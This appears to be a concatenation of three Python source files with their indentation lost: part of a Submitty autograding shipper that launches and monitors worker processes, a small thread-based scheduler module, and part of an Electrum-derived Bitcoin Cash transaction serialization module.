file_path = str(file_path)
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="Remove autograding TODO file: " + file_path)
os.remove(file_path)
for file_path in Path(SUBMITTY_DATA_DIR, "autograding_DONE").glob("*"):
file_path = str(file_path)
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="Remove autograding DONE file: " + file_path)
os.remove(file_path)
# this lock will be used to edit the queue or new job event
overall_lock = multiprocessing.Lock()
# The names of the worker machines, the capabilities of each
# worker machine, and the number of workers per machine are stored
# in the autograding_workers json.
try:
autograding_workers_path = os.path.join(SUBMITTY_INSTALL_DIR, 'config', "autograding_workers.json")
with open(autograding_workers_path, 'r') as infile:
autograding_workers = json.load(infile)
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
raise SystemExit("ERROR: could not locate the autograding workers json: {0}".format(e))
# There must always be a primary machine, it may or may not have
# autograding workers.
if not "primary" in autograding_workers:
raise SystemExit("ERROR: autograding_workers.json contained no primary machine.")
# One (or more) of the machines must accept "default" jobs.
default_present = False
for name, machine in autograding_workers.items():
if "default" in machine["capabilities"]:
default_present = True
break
if not default_present:
raise SystemExit("ERROR: autograding_workers.json contained no machine with default capabilities")
# Launch a shipper process for every worker on the primary machine and each worker machine
total_num_workers = 0
processes = list()
for name, machine in autograding_workers.items():
if worker_status_map[name] == False:
print("{0} could not be reached, so we are not spinning up shipper threads.".format(name))
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="{0} could not be reached, so we are not spinning up shipper threads.".format(name))
continue
if 'enabled' in machine and machine['enabled'] == False:
print("{0} is disabled, so we are not spinning up shipper threads.".format(name))
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="{0} is disabled, so we are not spinning up shipper threads.")
continue
try:
full_address = ""
if machine["address"] != "localhost":
if machine["username"] == "":
raise SystemExit("ERROR: empty username for worker machine {0} ".format(machine["address"]))
full_address = "{0}@{1}".format(machine["username"], machine["address"])
else:
if not machine["username"] == "":
raise SystemExit('ERROR: username for primary (localhost) must be ""')
full_address = machine['address']
num_workers_on_machine = machine["num_autograding_workers"]
if num_workers_on_machine < 0:
raise SystemExit("ERROR: num_workers_on_machine for '{0}' must be non-negative.".format(machine))
single_machine_data = {name : machine}
single_machine_data = add_fields_to_autograding_worker_json(single_machine_data, name)
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
print("ERROR: autograding_workers.json entry for {0} contains an error: {1}. For more details, see trace entry.".format(name, e))
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: autograding_workers.json entry for {0} contains an error: {1} For more details, see trace entry.".format(name,e))
continue
# launch the shipper threads
for i in range(0,num_workers_on_machine):
u = "untrusted" + str(i).zfill(2)
p = multiprocessing.Process(target=shipper_process,args=(name,single_machine_data,full_address, u,overall_lock))
p.start()
processes.append(p)
total_num_workers += num_workers_on_machine
# main monitoring loop
try:
while True:
alive = 0
for i in range(0,total_num_workers):
if processes[i].is_alive:
alive = alive+1
else:
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: process "+str(i)+" is not alive")
if alive != total_num_workers:
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: #shippers="+str(total_num_workers)+" != #alive="+str(alive))
#print ("shippers= ",total_num_workers," alive=",alive)
time.sleep(1)
except KeyboardInterrupt:
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="grade_scheduler.py keyboard interrupt")
# just kill everything in this group id right now
# NOTE: this may be a bug if the grandchildren have a different group id and not be killed
os.kill(-os.getpid(), signal.SIGKILL)
# run this to check if everything is dead
# ps xao pid,ppid,pgid,sid,comm,user | grep untrust
# everything's dead, including the main process so the rest of this will be ignored
# but this was mostly working...
# terminate the jobs
for i in range(0,total_num_workers):
processes[i].terminate()
# wait for them to join
for i in range(0,total_num_workers):
processes[i].join()
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="grade_scheduler.py terminated")
# ==================================================================================
if __name__ == "__main__":
# verify the DAEMON_USER is running this script
if not int(os.getuid()) == int(DAEMON_UID):
raise SystemExit("ERROR: the submitty_autograding_shipper.py script must be run by the DAEMON_USER")
worker_status_map = update_all_foreign_autograding_workers()
launch_shippers(worker_status_map)
|
scheduler.py
|
import sched
from threading import Thread
import time
s = sched.scheduler(time.time, time.sleep)
def schedule_event(func: callable, delay: int, priority: int):
s.enter(delay, priority, func)
def run_scheduler():
t = Thread(target=s.run)
t.start()
|
transaction.py
|
#!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Note: The deserialization code originally comes from ABE.
from .util import print_error, profiler
from .caches import ExpiringCache
from .bitcoin import *
from .address import (PublicKey, Address, Script, ScriptOutput, hash160,
UnknownAddress, OpCodes as opcodes,
P2PKH_prefix, P2PKH_suffix, P2SH_prefix, P2SH_suffix)
from . import schnorr
from . import util
import struct
import warnings
#
# Workalike python implementation of Bitcoin's CDataStream class.
#
from .keystore import xpubkey_to_address, xpubkey_to_pubkey
NO_SIGNATURE = 'ff'
class SerializationError(Exception):
""" Thrown when there's a problem deserializing or serializing """
class InputValueMissing(ValueError):
""" thrown when the value of an input is needed but not present """
class BCDataStream(object):
def __init__(self):
self.input = None
self.read_cursor = 0
def clear(self):
self.input = None
self.read_cursor = 0
def write(self, _bytes): # Initialize with string of _bytes
if self.input is None:
self.input = bytearray(_bytes)
else:
self.input += bytearray(_bytes)
def read_string(self, encoding='ascii'):
# Strings are encoded depending on length:
# 0 to 252 : 1-byte-length followed by bytes (if any)
# 253 to 65,535 : byte'253' 2-byte-length followed by bytes
# 65,536 to 4,294,967,295 : byte '254' 4-byte-length followed by bytes
# ... and the Bitcoin client is coded to understand:
# greater than 4,294,967,295 : byte '255' 8-byte-length followed by bytes of string
# ... but I don't think it actually handles any strings that big.
if self.input is None:
raise SerializationError("call write(bytes) before trying to deserialize")
length = self.read_compact_size()
return self.read_bytes(length).decode(encoding)
def write_string(self, string, encoding='ascii'):
string = to_bytes(string, encoding)
# Length-encoded as with read-string
self.write_compact_size(len(string))
self.write(string)
def read_bytes(self, length):
try:
result = self.input[self.read_cursor:self.read_cursor+length]
self.read_cursor += length
return result
except IndexError:
raise SerializationError("attempt to read past end of buffer")
return ''
def can_read_more(self) -> bool:
if not self.input:
return False
return self.read_cursor < len(self.input)
def read_boolean(self): return self.read_bytes(1)[0] != chr(0)
def read_int16(self): return self._read_num('<h')
def read_uint16(self): return self._read_num('<H')
def read_int32(self): return self._read_num('<i')
def read_uint32(self): return self._read_num('<I')
def read_int64(self): return self._read_num('<q')
def read_uint64(self): return self._read_num('<Q')
def write_boolean(self, val): return self.write(chr(1) if val else chr(0))
def write_int16(self, val): return self._write_num('<h', val)
def write_uint16(self, val): return self._write_num('<H', val)
def write_int32(self, val): return self._write_num('<i', val)
def write_uint32(self, val): return self._write_num('<I', val)
def write_int64(self, val): return self._write_num('<q', val)
def write_uint64(self, val): return self._write_num('<Q', val)
def read_compact_size(self):
try:
size = self.input[self.read_cursor]
self.read_cursor += 1
if size == 253:
size = self._read_num('<H')
elif size == 254:
size = self._read_num('<I')
elif size == 255:
size = self._read_num('<Q')
return size
except IndexError:
raise SerializationError("attempt to read past end of buffer")
def write_compact_size(self, size):
if size < 0:
raise SerializationError("attempt to write size < 0")
elif size < 253:
self.write(bytes([size]))
elif size < 2**16:
self.write(b'\xfd')
self._write_num('<H', size)
elif size < 2**32:
self.write(b'\xfe')
self._write_num('<I', size)
elif size < 2**64:
self.write(b'\xff')
self._write_num('<Q', size)
def _read_num(self, format):
try:
(i,) = struct.unpack_from(format, self.input, self.read_cursor)
self.read_cursor += struct.calcsize(format)
except Exception as e:
raise SerializationError(e)
return i
def _write_num(self, format, num):
s = struct.pack(format, num)
self.write(s)
# This function comes from bitcointools, bct-LICENSE.txt.
def long_hex(bytes):
return bytes.encode('hex_codec')
# This function comes from bitcointools, bct-LICENSE.txt.
def short_hex(bytes):
t = bytes.encode('hex_codec')
if len(t) < 11:
return t
return t[0:4]+"..."+t[-4:]
def script_GetOp(_bytes):
i = 0
blen = len(_bytes)
while i < blen:
vch = None
opcode = _bytes[i]
i += 1
if opcode <= opcodes.OP_PUSHDATA4:
nSize = opcode
if opcode == opcodes.OP_PUSHDATA1:
nSize = _bytes[i] if i < blen else 0
i += 1
elif opcode == opcodes.OP_PUSHDATA2:
(nSize,) = struct.unpack_from('<H', _bytes, i) if i+2 <= blen else (0,) # tolerate truncated script
i += 2
elif opcode == opcodes.OP_PUSHDATA4:
(nSize,) = struct.unpack_from('<I', _bytes, i) if i+4 <= blen else (0,)
i += 4
vch = _bytes[i:i + nSize] # array slicing here never throws exception even if truncated script
i += nSize
yield opcode, vch, i
def script_GetOpName(opcode):
return (opcodes.whatis(opcode)).replace("OP_", "")
def decode_script(bytes):
result = ''
for (opcode, vch, i) in script_GetOp(bytes):
if len(result) > 0: result += " "
if opcode <= opcodes.OP_PUSHDATA4:
result += "%d:"%(opcode,)
result += short_hex(vch)
else:
result += script_GetOpName(opcode)
return result
def match_decoded(decoded, to_match):
if len(decoded) != len(to_match):
return False
for i in range(len(decoded)):
if to_match[i] == opcodes.OP_PUSHDATA4 and decoded[i][0] <= opcodes.OP_PUSHDATA4 and decoded[i][0]>0:
continue # Opcodes below OP_PUSHDATA4 all just push data onto stack, and are equivalent.
if to_match[i] != decoded[i][0]:
return False
return True
def parse_sig(x_sig):
return [None if x == NO_SIGNATURE else x for x in x_sig]
def safe_parse_pubkey(x):
try:
return xpubkey_to_pubkey(x)
except:
return x
def parse_scriptSig(d, _bytes):
try:
decoded = list(script_GetOp(_bytes))
except Exception as e:
# coinbase transactions raise an exception
print_error("cannot find address in input script", bh2u(_bytes))
return
# added to suppress print_error statements during lib/test_slp_consensus.py (uses 'fake' transactions that have empty scriptSig)
if len(decoded) == 0:
return
match = [ opcodes.OP_PUSHDATA4 ]
if match_decoded(decoded, match):
item = decoded[0][1]
# payto_pubkey
d['type'] = 'p2pk'
d['signatures'] = [bh2u(item)]
d['num_sig'] = 1
d['x_pubkeys'] = ["(pubkey)"]
d['pubkeys'] = ["(pubkey)"]
return
# non-generated TxIn transactions push a signature
# (seventy-something bytes) and then their public key
# (65 bytes) onto the stack:
match = [ opcodes.OP_PUSHDATA4, opcodes.OP_PUSHDATA4 ]
if match_decoded(decoded, match):
sig = bh2u(decoded[0][1])
x_pubkey = bh2u(decoded[1][1])
try:
signatures = parse_sig([sig])
pubkey, address = xpubkey_to_address(x_pubkey)
except:
print_error("cannot find address in input script", bh2u(_bytes))
return
d['type'] = 'p2pkh'
d['signatures'] = signatures
d['x_pubkeys'] = [x_pubkey]
d['num_sig'] = 1
d['pubkeys'] = [pubkey]
d['address'] = address
return
# p2sh transaction, m of n
match = [ opcodes.OP_0 ] + [ opcodes.OP_PUSHDATA4 ] * (len(decoded) - 1)
if not match_decoded(decoded, match):
print_error("cannot find address in input script", bh2u(_bytes))
return
x_sig = [bh2u(x[1]) for x in decoded[1:-1]]
m, n, x_pubkeys, pubkeys, redeemScript = parse_redeemScript(decoded[-1][1])
# write result in d
d['type'] = 'p2sh'
d['num_sig'] = m
d['signatures'] = parse_sig(x_sig)
d['x_pubkeys'] = x_pubkeys
d['pubkeys'] = pubkeys
d['redeemScript'] = redeemScript
d['address'] = Address.from_P2SH_hash(hash160(redeemScript))
def parse_redeemScript(s):
dec2 = [ x for x in script_GetOp(s) ]
# the following throw exception when redeemscript has one or zero opcodes
m = dec2[0][0] - opcodes.OP_1 + 1
n = dec2[-2][0] - opcodes.OP_1 + 1
op_m = opcodes.OP_1 + m - 1
op_n = opcodes.OP_1 + n - 1
match_multisig = [ op_m ] + [opcodes.OP_PUSHDATA4]*n + [ op_n, opcodes.OP_CHECKMULTISIG ]
if not match_decoded(dec2, match_multisig):
# causes exception in caller when mismatched
print_error("cannot find address in input script", bh2u(s))
return
x_pubkeys = [bh2u(x[1]) for x in dec2[1:-2]]
pubkeys = [safe_parse_pubkey(x) for x in x_pubkeys]
redeemScript = Script.multisig_script(m, [bytes.fromhex(p)
for p in pubkeys])
return m, n, x_pubkeys, pubkeys, redeemScript
def get_address_from_output_script(_bytes):
scriptlen = len(_bytes)
if scriptlen == 23 and _bytes.startswith(P2SH_prefix) and _bytes.endswith(P2SH_suffix):
# Pay-to-script-hash
return TYPE_ADDRESS, Address.from_P2SH_hash(_bytes[2:22])
if scriptlen == 25 and _bytes.startswith(P2PKH_prefix) and _bytes.endswith(P2PKH_suffix):
# Pay-to-pubkey-hash
return TYPE_ADDRESS, Address.from_P2PKH_hash(_bytes[3:23])
if scriptlen == 35 and _bytes[0] == 33 and _bytes[1] in (2,3) and _bytes[34] == opcodes.OP_CHECKSIG:
# Pay-to-pubkey (compressed)
return TYPE_PUBKEY, PublicKey.from_pubkey(_bytes[1:34])
if scriptlen == 67 and _bytes[0] == 65 and _bytes[1] == 4 and _bytes[66] == opcodes.OP_CHECKSIG:
# Pay-to-pubkey (uncompressed)
return TYPE_PUBKEY, PublicKey.from_pubkey(_bytes[1:66])
# note: we don't recognize bare multisigs.
return TYPE_SCRIPT, ScriptOutput.protocol_factory(bytes(_bytes))
def parse_input(vds):
d = {}
prevout_hash = hash_encode(vds.read_bytes(32))
prevout_n = vds.read_uint32()
scriptSig = vds.read_bytes(vds.read_compact_size())
sequence = vds.read_uint32()
d['prevout_hash'] = prevout_hash
d['prevout_n'] = prevout_n
d['sequence'] = sequence
d['address'] = UnknownAddress()
if prevout_hash == '00'*32:
d['type'] = 'coinbase'
d['scriptSig'] = bh2u(scriptSig)
else:
d['x_pubkeys'] = []
d['pubkeys'] = []
d['signatures'] = {}
d['address'] = None
d['type'] = 'unknown'
d['num_sig'] = 0
d['scriptSig'] = bh2u(scriptSig)
try:
parse_scriptSig(d, scriptSig)
except Exception as e:
print_error('{}: Failed to parse tx input {}:{}, probably a p2sh (non multisig?). Exception was: {}'.format(__name__, prevout_hash, prevout_n, repr(e)))
# that whole heuristic codepath is fragile; just ignore it when it dies.
# failing tx examples:
# 1c671eb25a20aaff28b2fa4254003c201155b54c73ac7cf9c309d835deed85ee
# 08e1026eaf044127d7103415570afd564dfac3131d7a5e4b645f591cd349bb2c
# override these once more just to make sure
d['address'] = UnknownAddress()
d['type'] = 'unknown'
if not Transaction.is_txin_complete(d):
del d['scriptSig']
d['value'] = vds.read_uint64()
return d
def parse_output(vds, i):
d = {}
d['value'] = vds.read_int64()
scriptPubKey = vds.read_bytes(vds.read_compact_size())
d['type'], d['address'] = get_address_from_output_script(scriptPubKey)
d['scriptPubKey'] = bh2u(scriptPubKey)
d['prevout_n'] = i
return d
def deserialize(raw):
vds = BCDataStream()
vds.write(bfh(raw))
d = {}
start = vds.read_cursor
d['version'] = vds.read_int32()
n_vin = vds.read_compact_size()
d['inputs'] = [parse_input(vds) for i in range(n_vin)]
n_vout = vds.read_compact_size()
d['outputs'] = [parse_output(vds, i) for i in range(n_vout)]
d['lockTime'] = vds.read_uint32()
if vds.can_read_more():
raise SerializationError('extra junk at the end')
return d
# pay & redeem scripts
def multisig_script(public_keys, m):
n = len(public_keys)
assert n <= 15
assert m <= n
op_m = format(opcodes.OP_1 + m - 1, 'x')
op_n = format(opcodes.OP_1 + n - 1, 'x')
keylist = [op_push(len(k)//2) + k for k in public_keys]
return op_m + ''.join(keylist) + op_n + 'ae'
class Transaction:
SIGHASH_FORKID = 0x40 # do not use this; deprecated
FORKID = 0x000000 # do not use this; deprecated
def __str__(self):
if self.raw is None:
self.raw = self.serialize()
return self.raw
def __init__(self, raw, sign_schnorr=False):
if raw is None:
self.raw = None
elif isinstance(raw, str):
self.raw = raw.strip() if raw else None
elif isinstance(raw, dict):
self.raw = raw['hex']
else:
raise BaseException("cannot initialize transaction", raw)
self._inputs = None
self._outputs = None
self.locktime = 0
self.version = 1
self._sign_schnorr = sign_schnorr
# attribute used by HW wallets to tell the hw keystore about any outputs
# in the tx that are to self (change), etc. See wallet.py add_hw_info
# which writes to this dict and the various hw wallet plugins which
# read this dict.
self.output_info = dict()
# Ephemeral meta-data used internally to keep track of interesting
# things. This is currently written-to by coinchooser to tell UI code
# about 'dust_to_fee', which is change that's too small to go to change
# outputs (below dust threshold) and needed to go to the fee.
#
# It is also used to store the 'fetched_inputs' which are asynchronously
# retrieved inputs (by retrieving prevout_hash tx's), see
#`fetch_input_data`.
#
# Values in this dict are advisory only and may or may not always be
# there!
self.ephemeral = dict()
def set_sign_schnorr(self, b):
self._sign_schnorr = b
def update(self, raw):
self.raw = raw
self._inputs = None
self.deserialize()
def inputs(self):
if self._inputs is None:
self.deserialize()
return self._inputs
def outputs(self):
if self._outputs is None:
self.deserialize()
return self._outputs
@classmethod
def get_sorted_pubkeys(self, txin):
# sort pubkeys and x_pubkeys, using the order of pubkeys
x_pubkeys = txin['x_pubkeys']
pubkeys = txin.get('pubkeys')
if pubkeys is None:
pubkeys = [xpubkey_to_pubkey(x) for x in x_pubkeys]
pubkeys, x_pubkeys = zip(*sorted(zip(pubkeys, x_pubkeys)))
txin['pubkeys'] = pubkeys = list(pubkeys)
txin['x_pubkeys'] = x_pubkeys = list(x_pubkeys)
return pubkeys, x_pubkeys
def update_signatures(self, signatures):
"""Add new signatures to a transaction
`signatures` is expected to be a list of hex encoded sig strings with
*no* sighash byte at the end (implicitly always 0x41 (SIGHASH_FORKID|SIGHASH_ALL);
will be added by this function).
signatures[i] is intended for self._inputs[i].
The signature will be matched with the appropriate pubkey automatically
in the case of multisignature wallets.
This function is used by the Trezor, KeepKey, etc to update the
transaction with signatures form the device.
Note this function supports both Schnorr and ECDSA signatures, but as
yet no hardware wallets are signing Schnorr.
"""
if self.is_complete():
return
if not isinstance(signatures, (tuple, list)):
raise Exception('API changed: update_signatures expects a list.')
if len(self.inputs()) != len(signatures):
raise Exception('expected {} signatures; got {}'.format(len(self.inputs()), len(signatures)))
for i, txin in enumerate(self.inputs()):
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
sig = signatures[i]
if not isinstance(sig, str):
raise ValueError("sig was bytes, expected string")
# sig_final is the signature with the sighashbyte at the end (0x41)
sig_final = sig + '41'
if sig_final in txin.get('signatures'):
# skip if we already have this signature
continue
pre_hash = Hash(bfh(self.serialize_preimage(i)))
sig_bytes = bfh(sig)
added = False
reason = []
for j, pubkey in enumerate(pubkeys):
# see which pubkey matches this sig (in non-multisig only 1 pubkey, in multisig may be multiple pubkeys)
if self.verify_signature(bfh(pubkey), sig_bytes, pre_hash, reason):
print_error("adding sig", i, j, pubkey, sig_final)
self._inputs[i]['signatures'][j] = sig_final
added = True
if not added:
resn = ', '.join(reversed(reason)) if reason else ''
print_error("failed to add signature {} for any pubkey for reason(s): '{}' ; pubkey(s) / sig / pre_hash = ".format(i, resn),
pubkeys, '/', sig, '/', bh2u(pre_hash))
# redo raw
self.raw = self.serialize()
def is_schnorr_signed(self, input_idx):
''' Return True IFF any of the signatures for a particular input
are Schnorr signatures (Schnorr signatures are always 64 bytes + 1) '''
if (isinstance(self._inputs, (list, tuple))
and input_idx < len(self._inputs)
and self._inputs[input_idx]):
# Schnorr sigs are always 64 bytes. However the sig has a hash byte
# at the end, so that's 65. Plus we are hex encoded, so 65*2=130
return any(isinstance(sig, (str, bytes)) and len(sig) == 130
for sig in self._inputs[input_idx].get('signatures', []))
return False
def deserialize(self):
if self.raw is None:
return
if self._inputs is not None:
return
d = deserialize(self.raw)
self.invalidate_common_sighash_cache()
self._inputs = d['inputs']
self._outputs = [(x['type'], x['address'], x['value']) for x in d['outputs']]
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in self._outputs)
self.locktime = d['lockTime']
self.version = d['version']
return d
@classmethod
def from_io(klass, inputs, outputs, locktime=0, sign_schnorr=False):
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in outputs)
self = klass(None)
self._inputs = inputs
self._outputs = outputs.copy()
self.locktime = locktime
self.set_sign_schnorr(sign_schnorr)
return self
@classmethod
def pay_script(self, output):
return output.to_script().hex()
@classmethod
def estimate_pubkey_size_from_x_pubkey(cls, x_pubkey):
try:
if x_pubkey[0:2] in ['02', '03']: # compressed pubkey
return 0x21
elif x_pubkey[0:2] == '04': # uncompressed pubkey
return 0x41
elif x_pubkey[0:2] == 'ff': # bip32 extended pubkey
return 0x21
elif x_pubkey[0:2] == 'fe': # old electrum extended pubkey
return 0x41
except Exception as e:
pass
return 0x21 # just guess it is compressed
@classmethod
def estimate_pubkey_size_for_txin(cls, txin):
pubkeys = txin.get('pubkeys', [])
x_pubkeys = txin.get('x_pubkeys', [])
if pubkeys and len(pubkeys) > 0:
return cls.estimate_pubkey_size_from_x_pubkey(pubkeys[0])
elif x_pubkeys and len(x_pubkeys) > 0:
return cls.estimate_pubkey_size_from_x_pubkey(x_pubkeys[0])
else:
return 0x21 # just guess it is compressed
@classmethod
def get_siglist(self, txin, estimate_size=False, sign_schnorr=False):
# if we have enough signatures, we use the actual pubkeys
# otherwise, use extended pubkeys (with bip32 derivation)
num_sig = txin.get('num_sig', 1)
if estimate_size:
pubkey_size = self.estimate_pubkey_size_for_txin(txin)
pk_list = ["00" * pubkey_size] * len(txin.get('x_pubkeys', [None]))
# we assume that signature will be 0x48 bytes long if ECDSA, 0x41 if Schnorr
if sign_schnorr:
siglen = 0x41
else:
siglen = 0x48
sig_list = [ "00" * siglen ] * num_sig
else:
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
x_signatures = txin['signatures']
signatures = list(filter(None, x_signatures))
is_complete = len(signatures) == num_sig
if is_complete:
pk_list = pubkeys
sig_list = signatures
else:
pk_list = x_pubkeys
sig_list = [sig if sig else NO_SIGNATURE for sig in x_signatures]
return pk_list, sig_list
@classmethod
def input_script(self, txin, estimate_size=False, sign_schnorr=False):
# For already-complete transactions, scriptSig will be set and we prefer
# to use it verbatim in order to get an exact reproduction (including
# malleated push opcodes, etc.).
scriptSig = txin.get('scriptSig', None)
if scriptSig is not None:
return scriptSig
# For partially-signed inputs, or freshly signed transactions, the
# scriptSig will be missing and so we construct it from pieces.
_type = txin['type']
if _type == 'coinbase':
raise RuntimeError('Attempted to serialize coinbase with missing scriptSig')
pubkeys, sig_list = self.get_siglist(txin, estimate_size, sign_schnorr=sign_schnorr)
script = ''.join(push_script(x) for x in sig_list)
if _type == 'p2pk':
pass
elif _type == 'p2sh':
# put op_0 before script
script = '00' + script
redeem_script = multisig_script(pubkeys, txin['num_sig'])
script += push_script(redeem_script)
elif _type == 'p2pkh':
script += push_script(pubkeys[0])
elif _type == 'unknown':
raise RuntimeError('Cannot serialize unknown input with missing scriptSig')
return script
@classmethod
def is_txin_complete(cls, txin):
if txin['type'] == 'coinbase':
return True
num_sig = txin.get('num_sig', 1)
if num_sig == 0:
return True
x_signatures = txin['signatures']
signatures = list(filter(None, x_signatures))
return len(signatures) == num_sig
@classmethod
def get_preimage_script(self, txin):
_type = txin['type']
if _type == 'p2pkh':
return txin['address'].to_script().hex()
elif _type == 'p2sh':
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
return multisig_script(pubkeys, txin['num_sig'])
elif _type == 'p2pk':
pubkey = txin['pubkeys'][0]
return public_key_to_p2pk_script(pubkey)
elif _type == 'unknown':
# this approach enables most P2SH smart contracts (but take care if using OP_CODESEPARATOR)
return txin['scriptCode']
else:
raise RuntimeError('Unknown txin type', _type)
@classmethod
def serialize_outpoint(self, txin):
return bh2u(bfh(txin['prevout_hash'])[::-1]) + int_to_hex(txin['prevout_n'], 4)
@classmethod
def serialize_input(self, txin, script, estimate_size=False):
# Prev hash and index
s = self.serialize_outpoint(txin)
# Script length, script, sequence
s += var_int(len(script)//2)
s += script
s += int_to_hex(txin.get('sequence', 0xffffffff - 1), 4)
# offline signing needs to know the input value
if ('value' in txin
and txin.get('scriptSig') is None
and not (estimate_size or self.is_txin_complete(txin))):
s += int_to_hex(txin['value'], 8)
return s
def BIP_LI01_sort(self):
# See https://github.com/kristovatlas/rfc/blob/master/bips/bip-li01.mediawiki
self._inputs.sort(key = lambda i: (i['prevout_hash'], i['prevout_n']))
self._outputs.sort(key = lambda o: (o[2], self.pay_script(o[1])))
def serialize_output(self, output):
output_type, addr, amount = output
s = int_to_hex(amount, 8)
script = self.pay_script(addr)
s += var_int(len(script)//2)
s += script
return s
@classmethod
def nHashType(cls):
'''Hash type in hex.'''
warnings.warn("warning: deprecated tx.nHashType()", FutureWarning, stacklevel=2)
return 0x01 | (cls.SIGHASH_FORKID + (cls.FORKID << 8))
def invalidate_common_sighash_cache(self):
''' Call this to invalidate the cached common sighash (computed by
`calc_common_sighash` below).
This is function is for advanced usage of this class where the caller
has mutated the transaction after computing its signatures and would
like to explicitly delete the cached common sighash. See
`calc_common_sighash` below. '''
try: del self._cached_sighash_tup
except AttributeError: pass
def calc_common_sighash(self, use_cache=False):
""" Calculate the common sighash components that are used by
transaction signatures. If `use_cache` enabled then this will return
already-computed values from the `._cached_sighash_tup` attribute, or
compute them if necessary (and then store).
For transactions with N inputs and M outputs, calculating all sighashes
takes only O(N + M) with the cache, as opposed to O(N^2 + NM) without
the cache.
Returns three 32-long bytes objects: (hashPrevouts, hashSequence, hashOutputs).
Warning: If you modify non-signature parts of the transaction
afterwards, this cache will be wrong! """
inputs = self.inputs()
outputs = self.outputs()
meta = (len(inputs), len(outputs))
if use_cache:
try:
cmeta, res = self._cached_sighash_tup
except AttributeError:
pass
else:
# minimal heuristic check to detect bad cached value
if cmeta == meta:
# cache hit and heuristic check ok
return res
else:
del cmeta, res, self._cached_sighash_tup
hashPrevouts = Hash(bfh(''.join(self.serialize_outpoint(txin) for txin in inputs)))
hashSequence = Hash(bfh(''.join(int_to_hex(txin.get('sequence', 0xffffffff - 1), 4) for txin in inputs)))
hashOutputs = Hash(bfh(''.join(self.serialize_output(o) for o in outputs)))
res = hashPrevouts, hashSequence, hashOutputs
# cach resulting value, along with some minimal metadata to defensively
# program against cache invalidation (due to class mutation).
self._cached_sighash_tup = meta, res
return res
def serialize_preimage(self, i, nHashType=0x00000041, use_cache = False):
""" See `.calc_common_sighash` for explanation of use_cache feature """
if not (nHashType & 0xff) in [0x41, 0xc1]:
raise ValueError("other hashtypes not supported; submit a PR to fix this!")
anyonecanpay = True if (nHashType & 0x80) > 0 else False
nVersion = int_to_hex(self.version, 4)
nHashType = int_to_hex(nHashType, 4)
nLocktime = int_to_hex(self.locktime, 4)
txin = self.inputs()[i]
outpoint = self.serialize_outpoint(txin)
preimage_script = self.get_preimage_script(txin)
scriptCode = var_int(len(preimage_script) // 2) + preimage_script
try:
amount = int_to_hex(txin['value'], 8)
except KeyError:
raise InputValueMissing
nSequence = int_to_hex(txin.get('sequence', 0xffffffff - 1), 4)
hashPrevouts, hashSequence, hashOutputs = self.calc_common_sighash(use_cache = use_cache)
if anyonecanpay:
hashPrevouts = "0000000000000000000000000000000000000000000000000000000000000000"
hashSequence = "0000000000000000000000000000000000000000000000000000000000000000"
else:
hashPrevouts = bh2u(hashPrevouts)
hashSequence = bh2u(hashSequence)
preimage = nVersion + hashPrevouts + hashSequence + outpoint + scriptCode + amount + nSequence + bh2u(hashOutputs) + nLocktime + nHashType
return preimage
def serialize(self, estimate_size=False):
nVersion = int_to_hex(self.version, 4)
nLocktime = int_to_hex(self.locktime, 4)
inputs = self.inputs()
outputs = self.outputs()
txins = var_int(len(inputs)) + ''.join(self.serialize_input(txin, self.input_script(txin, estimate_size, self._sign_schnorr), estimate_size) for txin in inputs)
txouts = var_int(len(outputs)) + ''.join(self.serialize_output(o) for o in outputs)
return nVersion + txins + txouts + nLocktime
def hash(self):
warnings.warn("warning: deprecated tx.hash()", FutureWarning, stacklevel=2)
return self.txid()
def txid(self):
if not self.is_complete():
return None
ser = self.serialize()
return self._txid(ser)
def txid_fast(self):
''' Returns the txid by immediately calculating it from self.raw,
which is faster than calling txid() which does a full re-serialize
each time. Note this should only be used for tx's that you KNOW are
complete and that don't contain our funny serialization hacks.
(The is_complete check is also not performed here because that
potentially can lead to unwanted tx deserialization). '''
if self.raw:
return self._txid(self.raw)
return self.txid()
@staticmethod
def _txid(raw_hex : str) -> str:
return bh2u(Hash(bfh(raw_hex))[::-1])
def add_inputs(self, inputs):
self._inputs.extend(inputs)
self.raw = None
def add_outputs(self, outputs):
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in outputs)
self._outputs.extend(outputs)
self.raw = None
def input_value(self):
''' Will return the sum of all input values, if the input values
